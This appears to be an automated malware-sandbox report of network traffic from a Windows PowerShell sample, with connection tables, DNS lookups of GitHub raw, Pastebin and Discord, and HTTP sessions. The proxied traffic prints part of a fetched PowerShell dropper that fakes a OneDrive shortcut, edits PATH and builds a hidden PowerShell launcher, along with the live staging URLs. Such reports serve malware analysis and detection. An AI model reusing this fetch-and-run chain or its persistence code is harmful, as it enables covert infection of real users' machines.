                                                              Oct 15, 2024 16:01:26.562858105 CEST8049901104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:26.584403038 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.584441900 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:26.584510088 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.603745937 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.616962910 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.616987944 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.277482986 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.277568102 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.279268980 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.279279947 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.279540062 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.286078930 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.327413082 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430202007 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430325985 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430473089 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.452076912 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.474828005 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.479907990 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:27.479976892 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.480190992 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.485009909 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.116748095 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.117039919 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118220091 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118282080 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.118417978 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118705034 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118726969 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.122673035 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.123086929 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.775696039 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.775856972 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.777981043 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.778001070 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.778249979 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.779520988 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.823412895 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907011032 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907090902 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907135010 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907145023 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907162905 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907203913 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907263994 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907502890 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907548904 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907557964 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907579899 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907623053 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.929893017 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:33.142904043 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.142955065 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.143035889 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.143548012 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.143562078 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.750576019 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.750736952 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.752254963 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.752274990 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.752568960 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.753514051 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.799395084 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.799453020 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.799460888 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:34.007994890 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:34.008080959 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:34.008177042 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:34.010677099 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:39.060570955 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:41.291757107 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.291807890 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.291883945 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.292376041 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.292390108 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.917975903 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.918132067 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.930530071 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.930547953 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.930814981 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.932030916 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.979407072 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.979540110 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.979554892 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173263073 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173352003 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173449039 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:42.175905943 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:47.389467001 CEST4990180192.168.2.9104.20.3.235

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 15, 2024 16:00:59.864358902 CEST5200853192.168.2.91.1.1.1
                                                              Oct 15, 2024 16:00:59.871705055 CEST53520081.1.1.1192.168.2.9
                                                              Oct 15, 2024 16:01:17.863166094 CEST5855453192.168.2.91.1.1.1
                                                              Oct 15, 2024 16:01:17.870660067 CEST53585541.1.1.1192.168.2.9
                                                              Oct 15, 2024 16:01:19.976597071 CEST6546453192.168.2.91.1.1.1
                                                              Oct 15, 2024 16:01:19.984771013 CEST53654641.1.1.1192.168.2.9

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 15, 2024 16:00:59.864358902 CEST192.168.2.91.1.1.10x975dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:17.863166094 CEST192.168.2.91.1.1.10xa1c5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.976597071 CEST192.168.2.91.1.1.10x9665Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 15, 2024 16:00:59.871705055 CEST1.1.1.1192.168.2.90x975dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:00:59.871705055 CEST1.1.1.1192.168.2.90x975dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:00:59.871705055 CEST1.1.1.1192.168.2.90x975dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:00:59.871705055 CEST1.1.1.1192.168.2.90x975dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:17.870660067 CEST1.1.1.1192.168.2.90xa1c5No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:17.870660067 CEST1.1.1.1192.168.2.90xa1c5No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:17.870660067 CEST1.1.1.1192.168.2.90xa1c5No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.984771013 CEST1.1.1.1192.168.2.90x9665No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.984771013 CEST1.1.1.1192.168.2.90x9665No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.984771013 CEST1.1.1.1192.168.2.90x9665No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.984771013 CEST1.1.1.1192.168.2.90x9665No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                              Oct 15, 2024 16:01:19.984771013 CEST1.1.1.1192.168.2.90x9665No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • raw.githubusercontent.com
                                                              • pastebin.com
                                                              • discord.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.949757185.199.108.133807736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 16:00:59.890140057 CEST242OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 16:01:00.516709089 CEST561INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 0
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:00 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210056-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729000860.452538,VS0,VE0
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Expires: Tue, 15 Oct 2024 14:06:00 GMT
                                                              Vary: Authorization,Accept-Encoding


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.949854104.20.3.235807328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 16:01:17.886178970 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 16:01:18.492137909 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 14:01:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 15:01:18 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3057222e07e76e-DFW
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.949862185.199.108.133807328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 16:01:19.385906935 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 16:01:19.998683929 CEST541INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 0
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:19 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210142-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729000880.936151,VS0,VE0
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Expires: Tue, 15 Oct 2024 14:06:19 GMT
                                                              Vary: Authorization,Accept-Encoding


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.949901104.20.3.235807368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 16:01:25.937182903 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 16:01:26.562858105 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 14:01:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 15:01:26 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3057547f434778-DFW
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.949911185.199.108.133807368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 16:01:27.480190992 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 16:01:28.116748095 CEST541INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 0
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:28 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210129-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729000888.050116,VS0,VE0
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Expires: Tue, 15 Oct 2024 14:06:28 GMT
                                                              Vary: Authorization,Accept-Encoding


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.949763185.199.108.1334437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:01 UTC242OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:01 UTC899INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7088
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: 5B18:1AF8D8:AD9A7D:BD5271:670E73FF
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:01 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210104-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729000861.392010,VS0,VE79
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: 41c17bb6f8398b4c23d4ae01234082fcff43b3bb
                                                              Expires: Tue, 15 Oct 2024 14:06:01 GMT
                                                              Source-Age: 0
                                                              2024-10-15 14:01:01 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                              Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                              2024-10-15 14:01:01 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                              Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                                              2024-10-15 14:01:01 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                                              Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                                              2024-10-15 14:01:01 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                                              Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                                              2024-10-15 14:01:01 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                              Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
